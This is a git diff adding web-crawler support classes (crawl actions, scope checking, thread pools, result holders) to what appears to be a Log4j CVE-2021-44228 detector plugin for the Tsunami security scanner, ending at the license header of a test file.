+import com.google.tsunami.proto.CrawlResult;
+import com.google.tsunami.proto.CrawlTarget;
+
+/** Utilities for crawling and crawl results. */
+public final class CrawlUtils {
+
+  public static CrawlResult buildCrawlResult(
+      CrawlTarget crawlTarget, int crawlDepth, HttpResponse httpResponse) {
+    CrawlResult.Builder crawlResultBuilder =
+        CrawlResult.newBuilder()
+            .setCrawlTarget(crawlTarget)
+            .setCrawlDepth(crawlDepth)
+            .setResponseCode(httpResponse.status().code());
+    httpResponse.headers().get(CONTENT_TYPE).ifPresent(crawlResultBuilder::setContentType);
+    httpResponse.bodyBytes().ifPresent(crawlResultBuilder::setContent);
+    return crawlResultBuilder.build();
+  }
+
+  private CrawlUtils() {}
+}
diff --git a/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/Crawler.java b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/Crawler.java
new file mode 100644
index 000000000..6bc4d610b
--- /dev/null
+++ b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/Crawler.java
@@ -0,0 +1,54 @@
+/*
+ * Copyright 2020 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.cves.cve202144228.crawl;
+
+import com.google.common.collect.ImmutableSet;
+import com.google.common.util.concurrent.ListenableFuture;
+import com.google.tsunami.proto.CrawlConfig;
+import com.google.tsunami.proto.CrawlResult;
+import java.util.concurrent.ExecutionException;
+
+/**
+ * A crawler starts from several seeding URLs and recursively fetches web content by following
+ * reachable links extracted from the requested resources.
+ */
+public interface Crawler {
+
+  /**
+   * Performs the crawling action based on the given {@code crawlConfig}.
+   *
+   * @param crawlConfig config for this crawling action
+   * @return all the fetched web contents.
+   */
+  default ImmutableSet<CrawlResult> crawl(CrawlConfig crawlConfig) {
+    try {
+      return crawlAsync(crawlConfig).get();
+    } catch (InterruptedException e) {
+      Thread.currentThread().interrupt();
+      throw new CrawlerException("Crawler got interrupted.", e);
+    } catch (ExecutionException e) {
+      throw new CrawlerException("Crawler failed crawling with unexpected error.", e);
+    }
+  }
+
+  /**
+   * Performs the crawling action based on the given {@code crawlConfig}, asynchronously.
+   *
+   * @param crawlConfig config for this crawling action
+   * @return all the fetched web contents.
+   */
+  ListenableFuture<ImmutableSet<CrawlResult>> crawlAsync(CrawlConfig crawlConfig);
+}
diff --git a/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/CrawlerException.java b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/CrawlerException.java
new file mode 100644
index 000000000..ba301a151
--- /dev/null
+++ b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/CrawlerException.java
@@ -0,0 +1,23 @@
+/*
+ * Copyright 2020 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.cves.cve202144228.crawl;
+
+/** Exception used to signal when the crawler failed to crawl a web application. */
+public final class CrawlerException extends RuntimeException {
+  public CrawlerException(String message, Throwable cause) {
+    super(message, cause);
+  }
+}
diff --git a/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/ScopeUtils.java b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/ScopeUtils.java
new file mode 100644
index 000000000..cd1ddb11d
--- /dev/null
+++ b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/ScopeUtils.java
@@ -0,0 +1,145 @@
+/*
+ * Copyright 2020 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.cves.cve202144228.crawl;
+
+import static com.google.common.base.Preconditions.checkArgument;
+
+import com.google.common.base.CharMatcher;
+import com.google.common.base.Joiner;
+import com.google.common.base.Splitter;
+import com.google.common.base.Strings;
+import com.google.common.collect.Iterables;
+import com.google.tsunami.proto.CrawlConfig.Scope;
+import java.util.List;
+import java.util.OptionalInt;
+import java.util.regex.Pattern;
+import okhttp3.HttpUrl;
+
+/** Static utility methods pertaining to {@link Scope} proto buffer. */
+public final class ScopeUtils {
+  private static final Pattern ENDING_SLASHES_PATTERN = Pattern.compile("/+$");
+  private static final Joiner PATH_JOINER = Joiner.on('/');
+
+  private ScopeUtils() {}
+
+  /**
+   * Checks if the given {@code url} is within the {@code scope}. Subpaths and subdomains are
+   * accepted. Port comparison is only enforced if the scope port is present.
+   */
+  public static boolean isInScope(Scope scope, String url) {
+    checkArgument(!Strings.isNullOrEmpty(url), "Url cannot be empty.");
+
+    return isInScope(scope, fromUrl(url));
+  }
+
+  /**
+   * Checks if the given {@code other} Scope is within the {@code scope}. Subpaths and subdomains
+   * are accepted. Port comparison is only enforced if the scope port is present.
+   */
+  public static boolean isInScope(Scope scope, Scope other) {
+    scope = normalize(scope);
+    other = normalize(other);
+
+    String scopeHost = getHost(scope.getDomain());
+    String otherHost = getHost(other.getDomain());
+    OptionalInt scopePort = getPort(scope.getDomain());
+    OptionalInt otherPort = getPort(other.getDomain());
+    String scopePath = scope.getPath();
+    String otherPath = other.getPath();
+
+    // Accept sub-paths and subdomains. Port comparison is only enforced hen the scope port is
+    // present.
+    return (otherHost.equals(scopeHost) || otherHost.endsWith("." + scopeHost))
+        && (otherPath.equals(scopePath) || otherPath.startsWith(scopePath + "/"))
+        && (!scopePort.isPresent() || scopePort.getAsInt() == otherPort.orElse(-1));
+  }
+
+  /** Builds a {@link Scope} protobuf from the given {@code url}. */
+  public static Scope fromUrl(String url) {
+    HttpUrl httpUrl = HttpUrl.parse(url);
+    if (httpUrl == null) {
+      throw new IllegalArgumentException(String.format("Input url '%s' cannot be parsed.", url));
+    }
+
+    String domain = buildScopeDomain(httpUrl);
+    List<String> pathSegments = httpUrl.pathSegments();
+
+    // If path ends with "/", build Scope directly from path.
+    if (Iterables.getLast(pathSegments).isEmpty()) {
+      return normalize(
+          Scope.newBuilder()
+              .setDomain(domain)
+              .setPath(buildPathFromSegments(pathSegments))
+              .build());
+    }
+
+    // If the URL has more than one path segment, drop the last segment, e.g. /path/last -> /path.
+    if (pathSegments.size() > 1) {
+      pathSegments = pathSegments.subList(0, pathSegments.size() - 1);
+    }
+
+    // Drop the last segment if it is a filename, e.g. /path/index.html -> /path.
+    String lastPath = Iterables.getLast(pathSegments);
+    if (lastPath.contains(".")) {
+      List<String> segments = Splitter.on('.').splitToList(lastPath);
+      // Heuristic check on whether the last segment is a filename.
+      if (!segments.get(0).isEmpty() && segments.get(1).length() < 5) {
+        pathSegments = pathSegments.subList(0, pathSegments.size() - 1);
+      }
+    }
+
+    return normalize(
+        Scope.newBuilder().setDomain(domain).setPath(buildPathFromSegments(pathSegments)).build());
+  }
+
+  private static Scope normalize(Scope scope) {
+    // Remove trailing slashes in domain and path.
+    return Scope.newBuilder()
+        .setDomain(ENDING_SLASHES_PATTERN.matcher(scope.getDomain()).replaceAll(""))
+        .setPath(ENDING_SLASHES_PATTERN.matcher(scope.getPath()).replaceAll(""))
+        .build();
+  }
+
+  private static String buildPathFromSegments(List<String> segments) {
+    return "/" + PATH_JOINER.join(segments);
+  }
+
+  private static String buildScopeDomain(HttpUrl url) {
+    StringBuilder scopeDomainBuilder = new StringBuilder(url.host());
+    if (url.isHttps() ? url.port() == 443 : url.port() == 80) {
+      // Ignores well known ports.
+      return scopeDomainBuilder.toString();
+    }
+    return scopeDomainBuilder.append(":").append(url.port()).toString();
+  }
+
+  private static String getHost(String domain) {
+    return (CharMatcher.is(':').countIn(domain) == 1)
+        ? Splitter.on(':').splitToList(domain).get(0)
+        : domain;
+  }
+
+  private static OptionalInt getPort(String domain) {
+    if (CharMatcher.is(':').countIn(domain) == 1) {
+      try {
+        return OptionalInt.of(Integer.parseInt(Splitter.on(':').splitToList(domain).get(1)));
+      } catch (NumberFormatException e) {
+        return OptionalInt.empty();
+      }
+    }
+    return OptionalInt.empty();
+  }
+}
diff --git a/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/SimpleCrawlAction.java b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/SimpleCrawlAction.java
new file mode 100644
index 000000000..c37956d4d
--- /dev/null
+++ b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/SimpleCrawlAction.java
@@ -0,0 +1,163 @@
+/*
+ * Copyright 2020 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.cves.cve202144228.crawl;
+
+import static com.google.common.base.Preconditions.checkNotNull;
+import static com.google.common.collect.ImmutableSet.toImmutableSet;
+import static com.google.tsunami.plugins.detectors.cves.cve202144228.crawl.CrawlUtils.buildCrawlResult;
+
+import com.google.common.base.Strings;
+import com.google.common.collect.ImmutableSet;
+import com.google.common.collect.Streams;
+import com.google.common.flogger.GoogleLogger;
+import com.google.tsunami.common.net.http.HttpClient;
+import com.google.tsunami.common.net.http.HttpMethod;
+import com.google.tsunami.common.net.http.HttpRequest;
+import com.google.tsunami.common.net.http.HttpResponse;
+import com.google.tsunami.proto.CrawlConfig;
+import com.google.tsunami.proto.CrawlResult;
+import com.google.tsunami.proto.CrawlTarget;
+import java.util.Optional;
+import java.util.concurrent.RecursiveAction;
+import java.util.stream.Stream;
+import okhttp3.HttpUrl;
+
+/**
+ * A {@link RecursiveAction} that crawls a single web target.
+ *
+ * <p>The {@link SimpleCrawlAction} performs the crawling in the following fashion:
+ *
+ * <ol>
+ *   <li>Check whether the given target has already been visited. If so, {@link SimpleCrawlAction}
+ *       does nothing.
+ *   <li>If the target is a new target, send HTTP request to the target to retrieve the web
+ *       resources serviced on the target.
+ *   <li>Fill HTTP response data into {@link CrawlResult} protobuf.
+ *   <li>Extract links HTTP response headers and response body.
+ *   <li>For each links from HTTP response, create a new {@link SimpleCrawlAction} on the link
+ *       target and invoke all new actions. (This blocking recursive call is OK in a {@link
+ *       RecursiveAction} and {@link java.util.concurrent.ForkJoinPool}.
+ * </ol>
+ */
+final class SimpleCrawlAction extends RecursiveAction {
+  private static final GoogleLogger logger = GoogleLogger.forEnclosingClass();
+
+  private final int currentDepth;
+  private final HttpClient httpClient;
+  private final CrawlConfig crawlConfig;
+  private final CrawlTarget crawlTarget;
+  private final SimpleCrawlerResults crawlerResults;
+
+  SimpleCrawlAction(
+      int currentDepth,
+      HttpClient httpClient,
+      CrawlConfig crawlConfig,
+      CrawlTarget crawlTarget,
+      SimpleCrawlerResults crawlerResults) {
+    this.currentDepth = currentDepth;
+    this.httpClient = checkNotNull(httpClient);
+    this.crawlConfig = checkNotNull(crawlConfig);
+    this.crawlTarget = checkNotNull(crawlTarget);
+    this.crawlerResults = checkNotNull(crawlerResults);
+  }
+
+  String getTargetUrl() {
+    return crawlTarget.getUrl();
+  }
+
+  @Override
+  protected void compute() {
+    crawlerResults
+        .recordNewCrawlIfNotVisited(crawlTarget)
+        .ifPresent(
+            crawlResultBuilder -> {
+              try {
+                // This is a new CrawlTarget, performs the crawl and spawn new actions for the links
+                // extracted from the crawl response.
+                HttpResponse httpResponse =
+                    httpClient.send(buildHttpRequest(crawlTarget), crawlConfig.getNetworkService());
+                logger.atInfo().log(
+                    "SimpleCrawlAction visited target '%s' with method '%s' at depth '%d',"
+                        + " response code: %d.",
+                    crawlTarget.getUrl(),
+                    crawlTarget.getHttpMethod(),
+                    currentDepth,
+                    httpResponse.status().code());
+
+                crawlResultBuilder.mergeFrom(
+                    buildCrawlResult(crawlTarget, currentDepth, httpResponse));
+                spawnNewCrawlActions(httpResponse);
+              } catch (Throwable e) {
+                // Ignore all errors here as we don't try to recover. Failed crawl targets are
+                // simply ignored.
+                logger.atWarning().withCause(e).log(
+                    "SimpleCrawlAction cannot reach web resources at '%s', crawl target skipped.",
+                    crawlTarget.getUrl());
+              }
+            });
+  }
+
+  private static HttpRequest buildHttpRequest(CrawlTarget crawlTarget) {
+    HttpUrl targetUrl = HttpUrl.parse(crawlTarget.getUrl());
+    if (targetUrl == null) {
+      throw new IllegalArgumentException(
+          String.format(
+              "SimpleCrawlAction received a target with an invalid URL ('%s')",
+              crawlTarget.getUrl()));
+    }
+
+    return HttpRequest.builder()
+        .setMethod(HttpMethod.valueOf(crawlTarget.getHttpMethod()))
+        .setUrl(targetUrl)
+        .withEmptyHeaders()
+        .build();
+  }
+
+  private void spawnNewCrawlActions(HttpResponse httpResponse) {
+    // Stop crawling when the action reaches the max crawling depth.
+    if (currentDepth >= crawlConfig.getMaxDepth()) {
+      return;
+    }
+
+    HttpUrl baseUrl = HttpUrl.parse(crawlTarget.getUrl());
+    ImmutableSet<SimpleCrawlAction> newCrawlActions =
+        // Get new crawl targets from both HTTP headers and response body.
+        Streams.concat(
+                CrawlTargetUtils.extractFromHeaders(httpResponse.headers(), baseUrl).stream(),
+                httpResponse
+                    .bodyString()
+                    .map(body -> CrawlTargetUtils.extractFromHtml(body, baseUrl).stream())
+                    .orElse(Stream.empty()))
+            // Ignore invalid CrawlTarget urls.
+            .filter(SimpleCrawlAction::isValidCrawlTarget)
+            // Ignore out-of-scope URLs.
+            .filter(crawlTarget -> CrawlConfigUtils.isCrawlTargetInScope(crawlConfig, crawlTarget))
+            .map(this::newCrawlAction)
+            .collect(toImmutableSet());
+    invokeAll(newCrawlActions);
+  }
+
+  private static boolean isValidCrawlTarget(CrawlTarget crawlTarget) {
+    return Optional.ofNullable(HttpUrl.parse(crawlTarget.getUrl()))
+        .map(httpUrl -> !Strings.isNullOrEmpty(httpUrl.host()))
+        .orElse(false);
+  }
+
+  private SimpleCrawlAction newCrawlAction(CrawlTarget newCrawlTarget) {
+    return new SimpleCrawlAction(
+        currentDepth + 1, httpClient, crawlConfig, newCrawlTarget, crawlerResults);
+  }
+}
diff --git a/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/SimpleCrawler.java b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/SimpleCrawler.java
new file mode 100644
index 000000000..c928a60e4
--- /dev/null
+++ b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/SimpleCrawler.java
@@ -0,0 +1,99 @@
+/*
+ * Copyright 2020 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.cves.cve202144228.crawl;
+
+import static com.google.common.base.Preconditions.checkNotNull;
+import static com.google.common.collect.ImmutableSet.toImmutableSet;
+import static com.google.common.util.concurrent.MoreExecutors.directExecutor;
+
+import com.google.common.collect.ImmutableSet;
+import com.google.common.flogger.GoogleLogger;
+import com.google.common.util.concurrent.Futures;
+import com.google.common.util.concurrent.ListenableFuture;
+import com.google.common.util.concurrent.ListeningExecutorService;
+import com.google.tsunami.common.net.http.HttpClient;
+import com.google.tsunami.common.net.http.HttpMethod;
+import com.google.tsunami.proto.CrawlConfig;
+import com.google.tsunami.proto.CrawlResult;
+import com.google.tsunami.proto.CrawlTarget;
+import java.util.concurrent.ForkJoinPool;
+import javax.inject.Inject;
+
+/**
+ * A simple multithreaded implementation for a web crawler.
+ *
+ * <p>Under the hood this crawler assigns initial crawling tasks for the seeding URLs into a {@link
+ * ForkJoinPool}. Each worker thread in the pool will crawl one single URL, spawn and assign more
+ * crawling tasks back into the pool based on the links extracted from the crawled web resources.
+ */
+public final class SimpleCrawler implements Crawler {
+  private static final GoogleLogger logger = GoogleLogger.forEnclosingClass();
+
+  private final ForkJoinPool forkJoinPool;
+  private final ListeningExecutorService schedulingPool;
+  private final HttpClient httpClient;
+
+  @Inject
+  SimpleCrawler(
+      @SimpleCrawlerWorkerPool ForkJoinPool forkJoinPool,
+      @SimpleCrawlerSchedulingPool ListeningExecutorService schedulingPool,
+      HttpClient httpClient) {
+    this.forkJoinPool = checkNotNull(forkJoinPool);
+    this.schedulingPool = checkNotNull(schedulingPool);
+    this.httpClient = checkNotNull(httpClient).modify().setFollowRedirects(false).build();
+  }
+
+  @Override
+  public ListenableFuture<ImmutableSet<CrawlResult>> crawlAsync(CrawlConfig crawlConfig) {
+    // A global state shared across all crawling worker thread.
+    SimpleCrawlerResults crawlerResults = new SimpleCrawlerResults();
+    CrawlConfig crawlConfigWithScopes = CrawlConfigUtils.createDefaultScopesIfAbsent(crawlConfig);
+
+    // Starts crawling action on each seeding URL and ignores crawling errors.
+    ImmutableSet<ListenableFuture<Void>> crawlActionFutures =
+        crawlConfig.getSeedingUrlsList().stream()
+            .map(seedingUrl -> buildCrawlAction(crawlConfigWithScopes, seedingUrl, crawlerResults))
+            .map(crawlAction -> startCrawlAction(crawlAction, schedulingPool))
+            .collect(toImmutableSet());
+    return Futures.whenAllComplete(crawlActionFutures)
+        .call(crawlerResults::getFinalResults, schedulingPool);
+  }
+
+  private SimpleCrawlAction buildCrawlAction(
+      CrawlConfig crawlConfig, String url, SimpleCrawlerResults crawlerResults) {
+    CrawlTarget crawlTarget =
+        CrawlTarget.newBuilder().setHttpMethod(HttpMethod.GET.toString()).setUrl(url).build();
+    return new SimpleCrawlAction(0, httpClient, crawlConfig, crawlTarget, crawlerResults);
+  }
+
+  private ListenableFuture<Void> startCrawlAction(
+      SimpleCrawlAction crawlAction, ListeningExecutorService executorService) {
+    return Futures.catching(
+        // Start a crawling action on the working pool and assign a thread in executorService to
+        // wait for the result.
+        executorService.submit(() -> forkJoinPool.invoke(crawlAction)),
+        // Simple crawler simply swallows all exceptions from the worker pool and ignore the errored
+        // seed.
+        Throwable.class,
+        throwable -> {
+          logger.atWarning().withCause(throwable).log(
+              "Simple crawler failed crawling seeding url '%s', seed is ignored.",
+              crawlAction.getTargetUrl());
+          return null;
+        },
+        directExecutor());
+  }
+}
diff --git a/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/SimpleCrawlerModule.java b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/SimpleCrawlerModule.java
new file mode 100644
index 000000000..60720e6ff
--- /dev/null
+++ b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/SimpleCrawlerModule.java
@@ -0,0 +1,107 @@
+/*
+ * Copyright 2020 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.cves.cve202144228.crawl;
+
+import com.google.inject.AbstractModule;
+import com.google.inject.Provides;
+import com.google.tsunami.common.concurrent.ThreadPoolModule;
+import java.time.Duration;
+import java.util.concurrent.ForkJoinPool;
+import java.util.concurrent.ForkJoinPool.ForkJoinWorkerThreadFactory;
+import java.util.concurrent.ForkJoinWorkerThread;
+import java.util.concurrent.atomic.AtomicInteger;
+
+/** Guice module for installing the {@link SimpleCrawler} and dependencies. */
+public final class SimpleCrawlerModule extends AbstractModule {
+  private final int maxActiveThreads;
+  private final SimpleCrawlerWorkerThreadFactory threadFactory;
+
+  public SimpleCrawlerModule(int maxActiveThreads) {
+    this.maxActiveThreads = maxActiveThreads;
+    this.threadFactory = new SimpleCrawlerWorkerThreadFactory(maxActiveThreads);
+  }
+
+  @Override
+  protected void configure() {
+    bind(Crawler.class).to(SimpleCrawler.class);
+    install(
+        new ThreadPoolModule.Builder()
+            .setName("SimpleCrawlerSchedulingPool")
+            .setCoreSize(maxActiveThreads)
+            .setMaxSize(maxActiveThreads)
+            .setQueueCapacity(maxActiveThreads)
+            .setDaemon(true)
+            .setDelayedShutdown(Duration.ofMinutes(1))
+            .setPriority(Thread.NORM_PRIORITY)
+            .setAnnotation(SimpleCrawlerSchedulingPool.class)
+            .build());
+  }
+
+  @Provides
+  @SimpleCrawlerWorkerPool
+  ForkJoinPool providesSimpleCrawlerWorkerPool() {
+    return new ForkJoinPool(maxActiveThreads, threadFactory, null, false);
+  }
+
+  /**
+   * A {@link ForkJoinWorkerThreadFactory} implementation for executing {@link SimpleCrawler} tasks.
+   *
+   * <p>This implementation follows the discussion thread on "ForkJoinPool cap on number of threads"
+   * (see http://cs.oswego.edu/pipermail/concurrency-interest/2015-March/014187.html) to add a cap
+   * on the number of running threads by supplying a custom thread pool that returns null when the
+   * cap is exceeded.
+   *
+   * <p>We don't provide a general {@link ThreadPoolModule}
+   * variant for {@link ForkJoinPool} in Tsunami's codebase as we don't expect other use cases for
+   * it in any foreseeable future.
+   *
+   * TODO: replace this with the new JDK9 ForkJoinPool constructor once Tsunami is Java 11 ready.
+   */
+  private static final class SimpleCrawlerWorkerThreadFactory
+      implements ForkJoinWorkerThreadFactory {
+    private final int maxActiveThreads;
+    private final AtomicInteger threadCounter = new AtomicInteger();
+    private final AtomicInteger activeThreads = new AtomicInteger();
+
+    SimpleCrawlerWorkerThreadFactory(int maxActiveThreads) {
+      this.maxActiveThreads = maxActiveThreads;
+    }
+
+    @Override
+    public ForkJoinWorkerThread newThread(ForkJoinPool pool) {
+      int currentActive;
+      do {
+        currentActive = activeThreads.get();
+        if (currentActive >= maxActiveThreads) {
+          // Reject requests by returning null to enforce the cap on worker threads.
+          return null;
+        }
+      } while (!activeThreads.compareAndSet(currentActive, currentActive + 1));
+
+      ForkJoinWorkerThread thread =
+          new ForkJoinWorkerThread(pool) {
+            @Override
+            protected void onTermination(Throwable exception) {
+              activeThreads.decrementAndGet();
+              super.onTermination(exception);
+            }
+          };
+      thread.setName("SimpleCrawlerWorkerThread-" + threadCounter.getAndIncrement());
+      thread.setDaemon(true);
+      return thread;
+    }
+  }
+}
diff --git a/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/SimpleCrawlerResults.java b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/SimpleCrawlerResults.java
new file mode 100644
index 000000000..8a5c6a039
--- /dev/null
+++ b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/SimpleCrawlerResults.java
@@ -0,0 +1,50 @@
+/*
+ * Copyright 2020 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.cves.cve202144228.crawl;
+
+import static com.google.common.collect.ImmutableSet.toImmutableSet;
+
+import com.google.common.collect.ImmutableSet;
+import com.google.common.collect.Maps;
+import com.google.tsunami.proto.CrawlResult;
+import com.google.tsunami.proto.CrawlTarget;
+import java.util.Optional;
+import java.util.concurrent.ConcurrentMap;
+
+/** A thread safe crawl results holder for {@link SimpleCrawler}. */
+final class SimpleCrawlerResults {
+  private final ConcurrentMap<CrawlTarget, CrawlResult.Builder> crawlResultBuilderMap =
+      Maps.newConcurrentMap();
+
+  ImmutableSet<CrawlResult> getFinalResults() {
+    return crawlResultBuilderMap.values().stream()
+        .map(CrawlResult.Builder::build)
+        .filter(crawlResult -> !crawlResult.equals(CrawlResult.getDefaultInstance()))
+        .collect(toImmutableSet());
+  }
+
+  /**
+   * Records a potentially new crawling target if the target hasn't been visited by other crawling
+   * worker yet. This method guarantees that only one crawling worker thread gets the created
+   * CrawlResult builder.
+   */
+  Optional<CrawlResult.Builder> recordNewCrawlIfNotVisited(CrawlTarget crawlTarget) {
+    CrawlResult.Builder newCrawlResultBuilder = CrawlResult.newBuilder();
+    return crawlResultBuilderMap.putIfAbsent(crawlTarget, newCrawlResultBuilder) == null
+        ? Optional.of(newCrawlResultBuilder)
+        : Optional.empty();
+  }
+}
diff --git a/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/SimpleCrawlerSchedulingPool.java b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/SimpleCrawlerSchedulingPool.java
new file mode 100644
index 000000000..6d202a4c0
--- /dev/null
+++ b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/SimpleCrawlerSchedulingPool.java
@@ -0,0 +1,25 @@
+/*
+ * Copyright 2020 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.cves.cve202144228.crawl;
+
+import java.lang.annotation.Retention;
+import java.lang.annotation.RetentionPolicy;
+import javax.inject.Qualifier;
+
+/** Annotates the thread pool for scheduling the crawling workers of the {@link SimpleCrawler}. */
+@Qualifier
+@Retention(RetentionPolicy.RUNTIME)
+@interface SimpleCrawlerSchedulingPool {}
diff --git a/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/SimpleCrawlerWorkerPool.java b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/SimpleCrawlerWorkerPool.java
new file mode 100644
index 000000000..944b1a13b
--- /dev/null
+++ b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/SimpleCrawlerWorkerPool.java
@@ -0,0 +1,25 @@
+/*
+ * Copyright 2020 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.cves.cve202144228.crawl;
+
+import java.lang.annotation.Retention;
+import java.lang.annotation.RetentionPolicy;
+import javax.inject.Qualifier;
+
+/** Annotates the thread pool for executing the crawl actions of the {@link SimpleCrawler}. */
+@Qualifier
+@Retention(RetentionPolicy.RUNTIME)
+@interface SimpleCrawlerWorkerPool {}
diff --git a/community/detectors/log4j_rce/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202144228/Cve202144228VuLnDetectorTest.java b/community/detectors/log4j_rce/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202144228/Cve202144228VuLnDetectorTest.java
new file mode 100644
index 000000000..3a6c161f9
--- /dev/null
+++ b/community/detectors/log4j_rce/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202144228/Cve202144228VuLnDetectorTest.java
@@ -0,0 +1,187 @@
+/*
+ * Copyright 2021 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
